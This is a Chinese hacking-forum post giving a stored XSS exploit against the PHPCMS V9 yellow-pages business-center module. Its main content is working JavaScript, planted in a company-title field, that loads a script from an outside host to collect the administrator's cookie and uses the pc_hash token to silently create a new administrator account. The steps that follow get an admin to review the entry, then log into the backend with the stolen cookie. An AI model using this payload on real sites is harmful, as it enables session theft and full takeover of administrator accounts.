查看: 12793|回复: 0

phpcms V9黄页某处储存性XSS可盲打后台

[复制链接]
  • TA的每日心情
    无聊
    2015-7-8 20:25
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-3-23 12:03:16 | 显示全部楼层 |阅读模式
    我们要注册一个会员,然后才可以申请商务中心。可是商务中心是要求填写企业的资料的。

    我们再申请的时候可以这样子填写
    v1.jpg
    标题处插入我们预置的XSS,除了可以偷取cookie以外,我们还可以写一个加用户的js
    [JavaScript] 纯文本查看 复制代码
    documen.write('<script src=http://wooyun.com/yzmm></script>');
     
    //接收后台与cookie
     
    if(top.window.location.href.indexOf("pc_hash=")>0){
     
       var hash = top.window.location.href.substr(top.window.location.href.indexOf("pc_hash=")+8,6);
     
     }
     
     var xmlHttp = null;
     
     var cookie = document.cookie;
     
     var url = "index.php?m=admin&c=admin_manage&a=add";
     
     var urldata = "info%5Busername%5D=test&info%5Bpassword%5D=123456&info%5Bpwdconfirm%5D=123456&info%5Bemail%5D=felixk3y%40qq.com&info%5Brealname%5D=aaa&info%5Broleid%5D=1&dosubmit=%E6%8F%90%E4%BA%A4&pc_hash="+hash;
     
     //user=test
     
     //password=123456
     
    if(window.ActiveXObject){ 
     
        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
     
    }
     
    else if(window.XMLHttpRequest){ 
     
        xmlHttp=new XMLHttpRequest();
     
    } 
     
    if(xmlHttp!=null){
     
        xmlHttp.onreadystatechange=state_Change;
     
        xmlHttp.open("POST",url,false);
     
        xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;charset=UTF-8");
     
        xmlHttp.setRequestHeader("Cookie",cookie);
     
        xmlHttp.send(urldata);//不为null时,必须设置Content-Type
     
    }
     
    function state_Change()
     
    {
     
      if(xmlHttp.readyState==4)
     
      {
     
          if (xmlHttp.status==200) 
     
          {
     
             //alert(xmlHttp.responseText);
     
          }
     
       }
     
    }

    然后就是把各种资料填写完整,发给管理信息要求审核公司资料。

    一般开启黄页的都是希望用户在这里注册信息,用户越多,流量越大。所以一般都会很快去审核的。

    在管理后台审核的时候我们其实可以看到
    v2.jpg
    然后查看的时候,我们 成功的收获了cookie
    v3.jpg
    也利用该cookie成功登录了后台
    v4.jpg
    发现管理员也成功添加了
    v5.jpg
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 19:15 , Processed in 0.027738 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部